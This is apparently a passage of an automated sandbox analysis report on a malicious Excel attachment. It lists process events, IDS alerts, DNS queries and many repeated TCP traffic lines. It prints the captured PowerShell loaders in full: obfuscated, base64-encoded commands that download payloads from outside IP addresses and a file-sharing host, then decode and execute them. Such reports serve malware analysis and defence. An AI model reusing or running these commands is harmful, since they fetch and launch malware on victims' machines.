[dnlib.IO.Home].GetMethod(HeuVAIHeu);e3IvaiMethod.Invoke(e3Inull, @(Heutxt'+'.MRMAC/1231/571.44.271.701//:ptthHeu, HeudesativadoHeu, Heudesat'+'ivadoHeu, '+'HeudesativadoHeu, HeuCasPolHeu, HeudesativadoHeu, HeudesativadoHeu,He'+'udesativado'+'Heu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,HeudesativadoHeu,Heu1Heu,Heud'+'esativadoH'+'eu));').rEPlaCE(([cHAR]72+[cHAR]101+[cHAR]117),[STRING][cHAR]39).rEPlaCE(([cHAR]107+[cHAR]85+[cHAR]105),[STRING][cHAR]124).rEPlaCE('e3I','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PShomE[4]+$pShoMe[30]+'X')(('e3'+'Iimag'+'eUrl = Heuhttps://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_'+'0xCy-xl4tnxlAVbQ95-dviTK'+'5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Heu;e3IwebClient = New-Object System.Net.WebClient;e3Iima'+'geByte'+'s = e3IwebClient.DownloadData(e3IimageUrl);e3IimageText = [System.Text.Encoding'+']::UTF8.GetString(e3IimageBytes'+');e3Ista'+'rtFlag'+' = Heu<<BASE64_START>>Heu;e3IendFlag ='+' H'+'eu<<BASE64_END>>Heu;e3IstartIndex = e3IimageText.IndexOf(e3IstartFlag);e3IendIndex = e3IimageText.IndexOf(e3IendFlag);e3IstartIn'+'dex -ge 0 -and e3IendIndex -'+'gt e3IstartIndex;e3I'+'startIndex += e3Istart'+'Flag.Le'+'ngth;e3Ibase64Length = e3IendIndex - e3IstartIndex;e3'+'Ibase64Command = e3IimageText'+'.Substring(e3IstartIndex, e3Ibase64Length);e3Ibase64Re'+'v'+'e'+'rsed = -join (e3Ibase64Command.ToCh'+'arArray() kUi ForEach-Object { e3I_ })[-1..-(e3Ibase64Command.Length)];e3I'+'com'+'mandBytes = [System.'+'Convert]::FromBase64String(e'+'3Iba'+'se64Reversed);e3'+'Iloade'+'dAssem
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3784, TargetFilename: C:\Users\user\AppData\Local\Temp\lag13pa5.rx0.ps1

      Data Obfuscation

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYStEM32\WinDoWspowERshElL\V1.0\POwersHell.ExE" "poWERsHeLL.eXe -ex bYPass -nOp -W 1 -C dEVICEcredENTIaLDepLoYMEnT.EXe ; iEX($(iEx('[SYsTEm.tExT.EncOdINg]'+[cHAr]0x3a+[CHar]58+'UtF8.gETSTRINg([SysTem.CONVERT]'+[CHar]58+[cHAr]58+'Frombase64sTriNG('+[CHAr]0x22+'JEpQemwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmaU5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByVkZQY0wsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ09OZ0J5LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtaEJPLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZQT0VmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaXF3USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUZIU21reVdJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRKUHpsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMTMyMS9zZWV0aGViZXN0dGhpbmdzZW50aXJldGltZXdoaWNoZ2l2ZW5iZXN0ZGVzaWduZm9yeW91cnRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aGljaGdpdmVuYmVzdGRlc2lnbmZvcnlvdXJ0aC52QnMiLDAsMCk7c1RBcnQtc2xlRXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2hpY2hnaXZlbmJlc3RkZXNpZ25mb3J5b3VydGgudkJzIg=='+[cHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3784, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.cmdline", ProcessId: 3988, ProcessName: csc.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-26T15:49:02.095986+010020241971A Network Trojan was detected107.172.44.17580192.168.2.2249164TCP
      2024-11-26T15:49:07.144795+010020241971A Network Trojan was detected107.172.44.17580192.168.2.2249166TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-26T15:49:02.095969+010020244491Attempted User Privilege Gain192.168.2.2249164107.172.44.17580TCP
      2024-11-26T15:49:07.144771+010020244491Attempted User Privilege Gain192.168.2.2249166107.172.44.17580TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-26T15:48:58.373937+010020576351A Network Trojan was detected107.172.44.17580192.168.2.2249169TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-26T15:49:29.759254+010020490381A Network Trojan was detected193.30.119.205443192.168.2.2249168TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-26T15:48:58.373937+010028582951A Network Trojan was detected107.172.44.17580192.168.2.2249169TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-26T15:49:16.286145+010028587951A Network Trojan was detected192.168.2.2249167107.172.44.17580TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Shipping Document.xla.xlsxReversingLabs: Detection: 21%
      Source: Shipping Document.xla.xlsxJoe Sandbox ML: detected

      Phishing

      barindex
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall[1].hta, type: DROPPED
      Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49168 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: unknownHTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49163 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 152.231.102.107:443 -> 192.168.2.22:49165 version: TLS 1.2
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.pdb source: powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\cfogy1ty\cfogy1ty.pdbhP source: powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficDNS query: name: ljg.cl
      Source: global trafficDNS query: name: ljg.cl
      Source: global trafficDNS query: name: ljg.cl
      Source: global trafficDNS query: name: ljg.cl
      Source: global trafficDNS query: name: ljg.cl
      Source: global trafficDNS query: name: 3105.filemail.com
      Source: global trafficDNS query: name: 3105.filemail.com
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 107.172.44.175:80
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.102.107:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 193.30.119.205:443
